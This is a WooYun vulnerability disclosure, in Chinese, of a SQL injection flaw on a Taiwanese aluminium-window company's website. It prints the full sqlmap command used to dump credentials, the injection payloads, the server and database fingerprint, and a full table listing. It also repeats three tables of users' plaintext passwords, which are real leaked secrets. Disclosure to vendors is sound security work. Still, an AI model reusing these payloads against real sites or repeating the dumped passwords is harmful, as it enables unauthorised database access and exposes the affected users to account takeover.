当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0158881

漏洞标题:元一實業股份有限公司主站存在SQL注射漏洞(大量用户明文密码)(臺灣地區)

相关厂商:元一實業股份有限公司

漏洞作者: 路人甲

提交时间:2015-12-07 11:07

修复时间:2016-01-21 18:22

公开时间:2016-01-21 18:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-07: 细节已通知厂商并且等待厂商处理中
2015-12-08: 厂商已经确认,细节仅向厂商公开
2015-12-18: 细节向核心白帽子及相关领域专家公开
2015-12-28: 细节向普通白帽子公开
2016-01-07: 细节向实习白帽子公开
2016-01-21: 细节向公众公开

简要描述:


元一實業 創立於1975年,公司位於台灣台南,工廠面積約6,000坪。公司成立初期業務以鋁門窗型鋁擠製為主,自有品牌「元一鋁門窗」迄今已38年。
為拓展業務面與提供顧客更多服務,在1981年成立幕牆部,提供客戶專業的帷幕牆和鋁板牆加工安裝服務;並於2001年成立型鋁後端加工部門,提供客戶各項鋁製品鋸切、加工(沖、銑、專用機加工)、包裝等服務。公司專業技術和服務深受各方肯定,於2007年和日本NABCO(Nabtesco)公司技術合作,承製台北捷運新莊蘆洲線月台門工程,2008年更跨足太陽能產業,承製太陽能光電板相關鋁製品,同時本公司節能氣密窗、節能推開窗、節能推射窗和節能帷幕牆等四項產品榮獲2013年台灣精品。
品質方面,公司1981年即已取得建材CNS認證,1995年更通過ISO國際品質
認證,確立生產與安裝品質保證模式。另外本公司推開窗(YE-661)、橫拉窗(YE-218)先後榮獲內政部綠建材標章;並在2013年領先同業取得OHSAS18001及ISO14001認證,以期建立更優質的工作環境和為地球環保盡一份心力。

详细说明:

地址:http://**.**.**.**/news/?mode=data&id=126

$ python sqlmap.py -u "http://**.**.**.**/news/?mode=data&id=126" -p id --technique=BE --output-dir=output --random-agent --batch  --no-cast --current-user --is-dba --users --passwords --count --search -C pass


Database: yuangee
Table: imw_users
[28 entries]
+-------------+
| password |
+-------------+
| 0583fb |
| 07231112 |
| 12241006 |
| 123123 |
| 19791225 |
| 19847369 |
| 20070301 |
| 2023126 |
| 312068 |
| 320267 |
| 69621205 |
| 72050149 |
| 8904006 |
| 99731 |
| abcde |
| anita |
| asdfgh |
| doremefa |
| et780620et |
| isreal |
| k55555 |
| missmich |
| pp961205 |
| QQ123456 |
| sarah |
| she98741 |
| tester |
| zxcss583159 |
+-------------+
Database: yuangee
Table: en_users
[16 entries]
+----------+
| password |
+----------+
| 12241006 |
| 123123 |
| 20070301 |
| 312068 |
| 320267 |
| 72050149 |
| 8904006 |
| 9302001 |
| abcde |
| aleks |
| anita |
| asdfgh |
| isreal |
| sarah |
| she98741 |
| tester |
+----------+
Database: yuangee
Table: jp_users
[15 entries]
+----------+
| password |
+----------+
| 12241006 |
| 123123 |
| 20070301 |
| 312068 |
| 320267 |
| 72050149 |
| 8904006 |
| 9302001 |
| abcde |
| anita |
| asdfgh |
| isreal |
| sarah |
| she98741 |
| tester |
+----------+

漏洞证明:

---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: mode=data&id=126 AND 9162=9162
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: mode=data&id=126 AND (SELECT 2259 FROM(SELECT COUNT(*),CONCAT(0x7170707671,(SELECT (ELT(2259=2259,1))),0x7176717071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
web server operating system: Windows
web application technology: PHP 5.2.3, Apache 2.2.4
back-end DBMS: MySQL 5.0
current user: 'yuangee@localhost'
current user is DBA: False
database management system users [1]:
[*] 'yuangee'@'localhost'
Database: yuangee
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| imw_statistics_agent | 261382 |
| imw_statistics_visitors | 169170 |
| en_statistics_agent | 109372 |
| jp_statistics_agent | 109118 |
| imw_statistics_ad | 45479 |
| en_statistics_visitors | 35679 |
| ip2nation | 33903 |
| imw_statistics_functions | 22276 |
| jp_statistics_visitors | 21010 |
| en_statistics_functions | 19126 |
| jp_statistics_functions | 17556 |
| en_statistics_ad | 6928 |
| jp_statistics_ad | 5788 |
| imw_files | 769 |
| imw_files_link | 769 |
| imw_statistics_login_history | 693 |
| jp_files | 689 |
| jp_files_link | 689 |
| en_files | 687 |
| en_files_link | 687 |
| en_statistics_login_history | 417 |
| jp_statistics_login_history | 416 |
| ip2nationcountries | 246 |
| imw_content | 176 |
| en_content | 174 |
| jp_content | 173 |
| en_help | 141 |
| imw_help | 141 |
| jp_help | 141 |
| imw_news | 99 |
| en_gallery_album | 85 |
| imw_gallery_album | 85 |
| jp_gallery_album | 85 |
| en_system_setting | 80 |
| imw_system_setting | 80 |
| jp_system_setting | 80 |
| jp_news | 74 |
| en_news | 73 |
| imw_products | 71 |
| imw_products_link | 71 |
| imw_products_spec | 71 |
| en_products | 57 |
| en_products_link | 57 |
| en_products_spec | 57 |
| jp_products | 57 |
| jp_products_link | 57 |
| jp_products_spec | 57 |
| en_searchbot | 51 |
| imw_searchbot | 51 |
| jp_searchbot | 51 |
| imw_products_type | 49 |
| imw_users | 28 |
| imw_download | 25 |
| en_download | 21 |
| jp_download | 21 |
| en_users | 16 |
| jp_users | 15 |
| imw_contact_us | 14 |
| imw_sessions | 11 |
| imw_gallery_album_charts | 10 |
| en_web_content | 9 |
| imw_web_content | 9 |
| jp_web_content | 9 |
| en_about_us | 8 |
| imw_about_us | 8 |
| jp_about_us | 8 |
| en_gallery_type | 7 |
| en_products_type | 7 |
| imw_gallery_type | 7 |
| jp_gallery_type | 7 |
| jp_products_type | 7 |
| imw_download_type | 5 |
| en_download_type | 4 |
| en_news_type | 4 |
| imw_news_type | 4 |
| jp_download_type | 4 |
| jp_news_type | 4 |
| jp_sessions | 4 |
| en_sessions | 3 |
| en_users_type | 3 |
| imw_users_type | 3 |
| jp_contact_us | 3 |
| jp_users_type | 3 |
| en_ad | 2 |
| en_ad_link | 2 |
| en_contact_us | 2 |
| imw_ad | 2 |
| imw_ad_link | 2 |
| jp_ad | 2 |
| jp_ad_link | 2 |
| en_ad_type | 1 |
| en_themes | 1 |
| imw_ad_type | 1 |
| imw_contact_us_send_log | 1 |
| imw_themes | 1 |
| jp_ad_type | 1 |
| jp_themes | 1 |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 1356 |
| TABLES | 148 |
| STATISTICS | 144 |
| KEY_COLUMN_USAGE | 130 |
| TABLE_CONSTRAINTS | 127 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 126 |
| COLLATIONS | 126 |
| CHARACTER_SETS | 36 |
| SCHEMA_PRIVILEGES | 14 |
| SCHEMATA | 2 |
| USER_PRIVILEGES | 1 |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: yuangee
Table: imw_users
[1 column]
+----------+--------------+
| Column | Type |
+----------+--------------+
| password | varchar(100) |
+----------+--------------+
Database: yuangee
Table: en_users
[1 column]
+----------+--------------+
| Column | Type |
+----------+--------------+
| password | varchar(100) |
+----------+--------------+
Database: yuangee
Table: jp_users
[1 column]
+----------+--------------+
| Column | Type |
+----------+--------------+
| password | varchar(100) |
+----------+--------------+
Database: yuangee
Table: imw_users
[28 entries]
+-------------+
| password |
+-------------+
| 0583fb |
| 07231112 |
| 12241006 |
| 123123 |
| 19791225 |
| 19847369 |
| 20070301 |
| 2023126 |
| 312068 |
| 320267 |
| 69621205 |
| 72050149 |
| 8904006 |
| 99731 |
| abcde |
| anita |
| asdfgh |
| doremefa |
| et780620et |
| isreal |
| k55555 |
| missmich |
| pp961205 |
| QQ123456 |
| sarah |
| she98741 |
| tester |
| zxcss583159 |
+-------------+
Database: yuangee
Table: en_users
[16 entries]
+----------+
| password |
+----------+
| 12241006 |
| 123123 |
| 20070301 |
| 312068 |
| 320267 |
| 72050149 |
| 8904006 |
| 9302001 |
| abcde |
| aleks |
| anita |
| asdfgh |
| isreal |
| sarah |
| she98741 |
| tester |
+----------+
Database: yuangee
Table: jp_users
[15 entries]
+----------+
| password |
+----------+
| 12241006 |
| 123123 |
| 20070301 |
| 312068 |
| 320267 |
| 72050149 |
| 8904006 |
| 9302001 |
| abcde |
| anita |
| asdfgh |
| isreal |
| sarah |
| she98741 |
| tester |
+----------+

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2015-12-08 07:38

厂商回复:

感謝通報

最新状态:

暂无